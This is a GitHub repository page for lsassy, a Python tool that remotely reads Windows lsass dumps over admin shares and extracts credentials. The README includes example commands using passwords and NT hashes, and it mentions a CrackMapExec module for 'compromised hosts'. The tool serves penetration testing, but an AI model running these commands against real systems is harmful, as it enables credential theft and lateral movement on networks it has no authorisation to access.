Skip to content
Remotely parse lsass dumps and extract credentials
Python Makefile
Branch: master
Clone or download
Latest commit cc464be Dec 4, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
assets Rename picture file Dec 4, 2019
cme Add credentials to CME db Dec 4, 2019
lsassy Distinguish plaintext and hash authentication Dec 4, 2019
.gitignore Add gitignore Dec 3, 2019
LICENSE First commit Dec 3, 2019
Makefile First commit Dec 3, 2019
README.md Distinguish plaintext and hash authentication Dec 4, 2019
requirements.txt First commit Dec 3, 2019
setup.py New version Dec 4, 2019

README.md

lsassy

PyPI version

Python library to remotely parse lsass dump and extract credentials. This library uses impacket projects to remotely read necessary bytes in lsass dump and pypykatz to extract credentials.

Requirements

Basic Usage

lsassy [<domain>/]<user>[:<password>]@<target>:/share_name/path/to/lsass.dmp [--hashes [LM:]NT]

CrackMapExec module

I wrote a CrackMapExec module that uses lsassy to extract credentials on compromised hosts

CrackMapExec module is in cme folder : CME Module

Examples

lsassy

lsassy ADSEC.LOCAL/jsnow:Winter_is_coming_\!@dc01.adsec.local:/C$/Windows/Temp/lsass.dmp

lsassy Administrateur:952c28bd2fd728898411b301475009b7@desktop01.adsec.local:/ADMIN$/lsass.dmp

CME Module

Example image

Installing

From pip

python3.7 -m pip install lsassy

From sources

python3.7 setup.py install

Acknowledgments

  • Impacket
  • SkelSec for Pypykatz, but also for his patience and help
  • mpgn for his help and ideas
You can’t perform that action at this time.